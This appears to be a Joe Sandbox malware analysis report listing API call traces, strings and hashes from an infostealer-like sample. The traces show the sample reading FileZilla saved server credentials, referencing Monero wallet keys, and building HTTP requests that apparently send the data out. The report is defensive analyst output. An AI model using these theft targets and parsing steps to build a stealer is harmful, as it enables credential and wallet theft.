GetProcAddress.KERNEL32(74DD0000,00835730), ref: 00989E5D
GetProcAddress.KERNEL32(74DD0000,0084CEB8), ref: 00989E75
GetProcAddress.KERNEL32(74DD0000,0084D050), ref: 00989E8D
GetProcAddress.KERNEL32(74DD0000,0084D008), ref: 00989EA6
GetProcAddress.KERNEL32(74DD0000,0084CE58), ref: 00989EBE
GetProcAddress.KERNEL32(74DD0000,0084D0B0), ref: 00989ED6
GetProcAddress.KERNEL32(74DD0000,0084CE88), ref: 00989EEF
GetProcAddress.KERNEL32(74DD0000,0084CF48), ref: 00989F07
GetProcAddress.KERNEL32(74DD0000,0084CE70), ref: 00989F1F
GetProcAddress.KERNEL32(74DD0000,0084D0C8), ref: 00989F38
GetProcAddress.KERNEL32(74DD0000,0084A4E0), ref: 00989F50
GetProcAddress.KERNEL32(74DD0000,0084CEE8), ref: 00989F68
GetProcAddress.KERNEL32(74DD0000,0084CF60), ref: 00989F81
GetProcAddress.KERNEL32(74DD0000,00835750), ref: 00989F99
GetProcAddress.KERNEL32(74DD0000,0084CF90), ref: 00989FB1
GetProcAddress.KERNEL32(74DD0000,008357F0), ref: 00989FCA
GetProcAddress.KERNEL32(74DD0000,0084CFA8), ref: 00989FE2
GetProcAddress.KERNEL32(74DD0000,0084D0E0), ref: 00989FFA
GetProcAddress.KERNEL32(74DD0000,00835810), ref: 0098A013
GetProcAddress.KERNEL32(74DD0000,00835D10), ref: 0098A02B
LoadLibraryA.KERNEL32(0084CDF8,?,00985CA3,00990AEB,?,?,?,?,?,?,?,?,?,?,00990AEA,00990AE3), ref: 0098A03D
LoadLibraryA.KERNEL32(0084CFC0,?,00985CA3,00990AEB,?,?,?,?,?,?,?,?,?,?,00990AEA,00990AE3), ref: 0098A04E
LoadLibraryA.KERNEL32(0084D068,?,00985CA3,00990AEB,?,?,?,?,?,?,?,?,?,?,00990AEA,00990AE3), ref: 0098A060
LoadLibraryA.KERNEL32(0084D020,?,00985CA3,00990AEB,?,?,?,?,?,?,?,?,?,?,00990AEA,00990AE3), ref: 0098A072
LoadLibraryA.KERNEL32(0084CFD8,?,00985CA3,00990AEB,?,?,?,?,?,?,?,?,?,?,00990AEA,00990AE3), ref: 0098A083
LoadLibraryA.KERNEL32(0084D080,?,00985CA3,00990AEB,?,?,?,?,?,?,?,?,?,?,00990AEA,00990AE3), ref: 0098A095
LoadLibraryA.KERNEL32(0084CE10,?,00985CA3,00990AEB,?,?,?,?,?,?,?,?,?,?,00990AEA,00990AE3), ref: 0098A0A7
LoadLibraryA.KERNEL32(0084CE28,?,00985CA3,00990AEB,?,?,?,?,?,?,?,?,?,?,00990AEA,00990AE3), ref: 0098A0B8
GetProcAddress.KERNEL32(75290000,00835E30), ref: 0098A0DA
GetProcAddress.KERNEL32(75290000,0084D398), ref: 0098A0F2
GetProcAddress.KERNEL32(75290000,00848F48), ref: 0098A10A
GetProcAddress.KERNEL32(75290000,0084D2F0), ref: 0098A123
GetProcAddress.KERNEL32(75290000,00835BD0), ref: 0098A13B
GetProcAddress.KERNEL32(73440000,0083B8B0), ref: 0098A160
GetProcAddress.KERNEL32(73440000,00835CB0), ref: 0098A179
GetProcAddress.KERNEL32(73440000,0083B888), ref: 0098A191
GetProcAddress.KERNEL32(73440000,0084D290), ref: 0098A1A9
GetProcAddress.KERNEL32(73440000,0084D0F8), ref: 0098A1C2
GetProcAddress.KERNEL32(73440000,00835BF0), ref: 0098A1DA
GetProcAddress.KERNEL32(73440000,00835C10), ref: 0098A1F2
GetProcAddress.KERNEL32(73440000,0084D368), ref: 0098A20B
GetProcAddress.KERNEL32(752C0000,00835B10), ref: 0098A22C
GetProcAddress.KERNEL32(752C0000,00835DB0), ref: 0098A244
GetProcAddress.KERNEL32(752C0000,0084D230), ref: 0098A25D
GetProcAddress.KERNEL32(752C0000,0084D110), ref: 0098A275
GetProcAddress.KERNEL32(752C0000,00835DD0), ref: 0098A28D
GetProcAddress.KERNEL32(74EC0000,0083B5E0), ref: 0098A2B3
GetProcAddress.KERNEL32(74EC0000,0083B810), ref: 0098A2CB
GetProcAddress.KERNEL32(74EC0000,0084D308), ref: 0098A2E3
GetProcAddress.KERNEL32(74EC0000,00835AD0), ref: 0098A2FC
GetProcAddress.KERNEL32(74EC0000,00835DF0), ref: 0098A314
GetProcAddress.KERNEL32(74EC0000,0083B658), ref: 0098A32C
GetProcAddress.KERNEL32(75BD0000,0084D380), ref: 0098A352
GetProcAddress.KERNEL32(75BD0000,00835C50), ref: 0098A36A
GetProcAddress.KERNEL32(75BD0000,00848FD8), ref: 0098A382
GetProcAddress.KERNEL32(75BD0000,0084D350), ref: 0098A39B
GetProcAddress.KERNEL32(75BD0000,0084D188), ref: 0098A3B3
GetProcAddress.KERNEL32(75BD0000,00835E50), ref: 0098A3CB
GetProcAddress.KERNEL32(75BD0000,00835E10), ref: 0098A3E4
GetProcAddress.KERNEL32(75BD0000,0084D3C8), ref: 0098A3FC
GetProcAddress.KERNEL32(75BD0000,0084D2A8), ref: 0098A414
GetProcAddress.KERNEL32(75A70000,00835AB0), ref: 0098A436
GetProcAddress.KERNEL32(75A70000,0084D320), ref: 0098A44E
GetProcAddress.KERNEL32(75A70000,0084D128), ref: 0098A466
GetProcAddress.KERNEL32(75A70000,0084D1D0), ref: 0098A47F
GetProcAddress.KERNEL32(75A70000,0084D158), ref: 0098A497
GetProcAddress.KERNEL32(75450000,00835D30), ref: 0098A4B8
GetProcAddress.KERNEL32(75450000,00835AF0), ref: 0098A4D1
GetProcAddress.KERNEL32(75DA0000,00835B30), ref: 0098A4F2
GetProcAddress.KERNEL32(75DA0000,0084D248), ref: 0098A50A
GetProcAddress.KERNEL32(6F2C0000,00835C90), ref: 0098A530
GetProcAddress.KERNEL32(6F2C0000,00835B50), ref: 0098A548
GetProcAddress.KERNEL32(6F2C0000,00835C70), ref: 0098A560
GetProcAddress.KERNEL32(6F2C0000,0084D2C0), ref: 0098A579
GetProcAddress.KERNEL32(6F2C0000,00835D50), ref: 0098A591
GetProcAddress.KERNEL32(6F2C0000,00835D70), ref: 0098A5A9
GetProcAddress.KERNEL32(6F2C0000,00835CD0), ref: 0098A5C2
GetProcAddress.KERNEL32(6F2C0000,00835B70), ref: 0098A5DA
GetProcAddress.KERNEL32(6F2C0000,InternetSetOptionA), ref: 0098A5F1
GetProcAddress.KERNEL32(6F2C0000,HttpQueryInfoA), ref: 0098A607
GetProcAddress.KERNEL32(75AF0000,0084D338), ref: 0098A629
GetProcAddress.KERNEL32(75AF0000,00848F58), ref: 0098A641
GetProcAddress.KERNEL32(75AF0000,0084D3E0), ref: 0098A659
GetProcAddress.KERNEL32(75AF0000,0084D140), ref: 0098A672
GetProcAddress.KERNEL32(75D90000,00835B90), ref: 0098A693
GetProcAddress.KERNEL32(6E550000,0084D2D8), ref: 0098A6B4
GetProcAddress.KERNEL32(6E550000,00835BB0), ref: 0098A6CD
GetProcAddress.KERNEL32(6E550000,0084D260), ref: 0098A6E5
GetProcAddress.KERNEL32(6E550000,0084D278), ref: 0098A6FD

Strings

InternetSetOptionA, xrefs: 0098A5E5
HttpQueryInfoA, xrefs: 0098A5FC

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: d73b545d8d13c81aba1afc9fb7564e2478f98f155cf921698269f05a4e0e3fcf
Instruction ID: 7d0a78ef5a6092f494494d9f184f537456677acfa4ee8ee73054286176a8d85c
Opcode Fuzzy Hash: d73b545d8d13c81aba1afc9fb7564e2478f98f155cf921698269f05a4e0e3fcf
Instruction Fuzzy Hash: 1E623DB5D08200AFC354DFAAED989563BF9F74C701724871AA609C3664DFBAA841DF13

Function 00977710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00977724
RtlAllocateHeap.NTDLL(00000000), ref: 0097772B
lstrcat.KERNEL32(?,00849C80), ref: 009778DB
lstrcat.KERNEL32(?,?), ref: 009778EF
lstrcat.KERNEL32(?,?), ref: 00977903
lstrcat.KERNEL32(?,?), ref: 00977917
lstrcat.KERNEL32(?,0084E4B8), ref: 0097792B
lstrcat.KERNEL32(?,0084E488), ref: 0097793F
lstrcat.KERNEL32(?,0084E620), ref: 00977952
lstrcat.KERNEL32(?,0084E560), ref: 00977966
lstrcat.KERNEL32(?,00849D08), ref: 0097797A
lstrcat.KERNEL32(?,?), ref: 0097798E
lstrcat.KERNEL32(?,?), ref: 009779A2
lstrcat.KERNEL32(?,?), ref: 009779B6
lstrcat.KERNEL32(?,0084E4B8), ref: 009779C9
lstrcat.KERNEL32(?,0084E488), ref: 009779DD
lstrcat.KERNEL32(?,0084E620), ref: 009779F1
lstrcat.KERNEL32(?,0084E560), ref: 00977A04
lstrcat.KERNEL32(?,00849D70), ref: 00977A18
lstrcat.KERNEL32(?,?), ref: 00977A2C
lstrcat.KERNEL32(?,?), ref: 00977A40
lstrcat.KERNEL32(?,?), ref: 00977A54
lstrcat.KERNEL32(?,0084E4B8), ref: 00977A68
lstrcat.KERNEL32(?,0084E488), ref: 00977A7B
lstrcat.KERNEL32(?,0084E620), ref: 00977A8F
lstrcat.KERNEL32(?,0084E560), ref: 00977AA3
lstrcat.KERNEL32(?,00849DD8), ref: 00977AB6
lstrcat.KERNEL32(?,?), ref: 00977ACA
lstrcat.KERNEL32(?,?), ref: 00977ADE
lstrcat.KERNEL32(?,?), ref: 00977AF2
lstrcat.KERNEL32(?,0084E4B8), ref: 00977B06
lstrcat.KERNEL32(?,0084E488), ref: 00977B1A
lstrcat.KERNEL32(?,0084E620), ref: 00977B2D
lstrcat.KERNEL32(?,0084E560), ref: 00977B41
lstrcat.KERNEL32(?,0084E648), ref: 00977B55
lstrcat.KERNEL32(?,?), ref: 00977B69
lstrcat.KERNEL32(?,?), ref: 00977B7D
lstrcat.KERNEL32(?,?), ref: 00977B91
lstrcat.KERNEL32(?,0084E4B8), ref: 00977BA4
lstrcat.KERNEL32(?,0084E488), ref: 00977BB8
lstrcat.KERNEL32(?,0084E620), ref: 00977BCC
lstrcat.KERNEL32(?,0084E560), ref: 00977BDF
lstrcat.KERNEL32(?,0084E6B0), ref: 00977BF3
lstrcat.KERNEL32(?,?), ref: 00977C07
lstrcat.KERNEL32(?,?), ref: 00977C1B
lstrcat.KERNEL32(?,?), ref: 00977C2F
lstrcat.KERNEL32(?,0084E4B8), ref: 00977C43
lstrcat.KERNEL32(?,0084E488), ref: 00977C56
lstrcat.KERNEL32(?,0084E620), ref: 00977C6A
lstrcat.KERNEL32(?,0084E560), ref: 00977C7E

Part of subcall function 009775D0: lstrcat.KERNEL32(2F3D1020,009917FC), ref: 00977606
Part of subcall function 009775D0: lstrcat.KERNEL32(2F3D1020,00000000), ref: 00977648
Part of subcall function 009775D0: lstrcat.KERNEL32(2F3D1020, : ), ref: 0097765A
Part of subcall function 009775D0: lstrcat.KERNEL32(2F3D1020,00000000), ref: 0097768F
Part of subcall function 009775D0: lstrcat.KERNEL32(2F3D1020,00991804), ref: 009776A0
Part of subcall function 009775D0: lstrcat.KERNEL32(2F3D1020,00000000), ref: 009776D3
Part of subcall function 009775D0: lstrcat.KERNEL32(2F3D1020,00991808), ref: 009776ED
Part of subcall function 009775D0: task.LIBCPMTD ref: 009776FB

lstrcat.KERNEL32(?,0084EA88), ref: 00977E0B
lstrcat.KERNEL32(?,0084D8A0), ref: 00977E1E
lstrlen.KERNEL32(2F3D1020), ref: 00977E2B
lstrlen.KERNEL32(2F3D1020), ref: 00977E3B

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: d992feb6c8f6f2c07ecc226946a614c1fb966a1b562564b7a563a23452a3665e
Instruction ID: de59e13a1bee7569bffed591b40ff9cb63776e32e31ec98cd517fa9db202cd73
Opcode Fuzzy Hash: d992feb6c8f6f2c07ecc226946a614c1fb966a1b562564b7a563a23452a3665e
Instruction Fuzzy Hash: B732E0B6D10314ABCB15EBA0DC85EEA737CBB44700F444A99F21D63190EEB5E7858F61

Function 00980250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

Part of subcall function 00988DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00988E0B

Part of subcall function 0098A920: lstrcpy.KERNEL32(00000000,?), ref: 0098A972
Part of subcall function 0098A920: lstrcat.KERNEL32(00000000), ref: 0098A982

Part of subcall function 0098A8A0: lstrcpy.KERNEL32(?,00990E17), ref: 0098A905

Part of subcall function 0098A9B0: lstrlen.KERNEL32(?,00849138,?,\Monero\wallet.keys,00990E17), ref: 0098A9C5
Part of subcall function 0098A9B0: lstrcpy.KERNEL32(00000000), ref: 0098AA04
Part of subcall function 0098A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AA12

Part of subcall function 0098A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0098A7E6

Part of subcall function 009799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009799EC
Part of subcall function 009799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00979A11
Part of subcall function 009799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00979A31
Part of subcall function 009799C0: ReadFile.KERNEL32(000000FF,?,00000000,0097148F,00000000), ref: 00979A5A
Part of subcall function 009799C0: LocalFree.KERNEL32(0097148F), ref: 00979A90
Part of subcall function 009799C0: CloseHandle.KERNEL32(000000FF), ref: 00979A9A

Part of subcall function 00988E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00988E52

GetProcessHeap.KERNEL32(00000000,000F423F,00990DBA,00990DB7,00990DB6,00990DB3), ref: 00980362
RtlAllocateHeap.NTDLL(00000000), ref: 00980369
StrStrA.SHLWAPI(00000000,<Host>), ref: 00980385
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB2), ref: 00980393
StrStrA.SHLWAPI(00000000,<Port>), ref: 009803CF
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB2), ref: 009803DD
StrStrA.SHLWAPI(00000000,<User>), ref: 00980419
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB2), ref: 00980427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00980463
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB2), ref: 00980475
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB2), ref: 00980502
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB2), ref: 0098051A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB2), ref: 00980532
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB2), ref: 0098054A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 00980562
lstrcat.KERNEL32(?,profile: null), ref: 00980571
lstrcat.KERNEL32(?,url: ), ref: 00980580
lstrcat.KERNEL32(?,00000000), ref: 00980593
lstrcat.KERNEL32(?,00991678), ref: 009805A2
lstrcat.KERNEL32(?,00000000), ref: 009805B5
lstrcat.KERNEL32(?,0099167C), ref: 009805C4
lstrcat.KERNEL32(?,login: ), ref: 009805D3
lstrcat.KERNEL32(?,00000000), ref: 009805E6
lstrcat.KERNEL32(?,00991688), ref: 009805F5
lstrcat.KERNEL32(?,password: ), ref: 00980604
lstrcat.KERNEL32(?,00000000), ref: 00980617
lstrcat.KERNEL32(?,00991698), ref: 00980626
lstrcat.KERNEL32(?,0099169C), ref: 00980635
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB2), ref: 0098068E

Strings

browser: FileZilla, xrefs: 00980559
password: , xrefs: 009805FB
<Port>, xrefs: 009803C6
url: , xrefs: 00980577
<Host>, xrefs: 0098037C
profile: null, xrefs: 00980568
login: , xrefs: 009805CA
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 009802A4
<Pass encoding="base64">, xrefs: 0098045A
<User>, xrefs: 00980410

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: 971796183f072574f85bd03a8fb32a5dbf391f7b925930e83408010b0bd91afb
Instruction ID: 176220d2fa302923a927272426f9bf49a53ab107291fb9083cab0e448bf4d68a
Opcode Fuzzy Hash: 971796183f072574f85bd03a8fb32a5dbf391f7b925930e83408010b0bd91afb
Instruction Fuzzy Hash: 40D1FE71D00208ABDB04FBF4DD96EEE7779BF94300F544519F102A7291EE78AA06CB62

Function 00975100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0098A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0098A7E6

Part of subcall function 009747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00974839
Part of subcall function 009747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00974849

lstrlen.KERNEL32(00000000), ref: 00975193

Part of subcall function 00988EA0: CryptBinaryToStringA.CRYPT32(00000000,00975184,40000001,00000000,00000000,?,00975184), ref: 00988EC0

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00975207
StrCmpCA.SHLWAPI(?,0084EAD8), ref: 00975225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00975340
HttpOpenRequestA.WININET(00000000,0084EA08,?,0084DFC0,00000000,00000000,00400100,00000000), ref: 009753A4

Part of subcall function 0098A9B0: lstrlen.KERNEL32(?,00849138,?,\Monero\wallet.keys,00990E17), ref: 0098A9C5
Part of subcall function 0098A9B0: lstrcpy.KERNEL32(00000000), ref: 0098AA04
Part of subcall function 0098A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AA12

Part of subcall function 0098A8A0: lstrcpy.KERNEL32(?,00990E17), ref: 0098A905

Part of subcall function 0098A920: lstrcpy.KERNEL32(00000000,?), ref: 0098A972
Part of subcall function 0098A920: lstrcat.KERNEL32(00000000), ref: 0098A982

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,0084EAC8,00000000,?,0084A720,00000000,?,009919DC,00000000,?,009851CF), ref: 00975737
lstrlen.KERNEL32(00000000), ref: 0097574B
GetProcessHeap.KERNEL32(00000000,?), ref: 0097575C
RtlAllocateHeap.NTDLL(00000000), ref: 00975763
lstrlen.KERNEL32(00000000), ref: 00975778
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 009757A9
lstrlen.KERNEL32(00000000), ref: 009757C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 009757E1
lstrlen.KERNEL32(00000000,?,?), ref: 0097580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00975822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0097584D
InternetCloseHandle.WININET(00000000), ref: 009758B1
InternetCloseHandle.WININET(00000000), ref: 009758BE
InternetCloseHandle.WININET(00000000), ref: 009758C8

Strings

", xrefs: 009755C4
", xrefs: 00975482
------, xrefs: 00975297
------, xrefs: 009753B7
", xrefs: 00975706
------, xrefs: 009754F9
------, xrefs: 0097563B
--, xrefs: 00975280

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
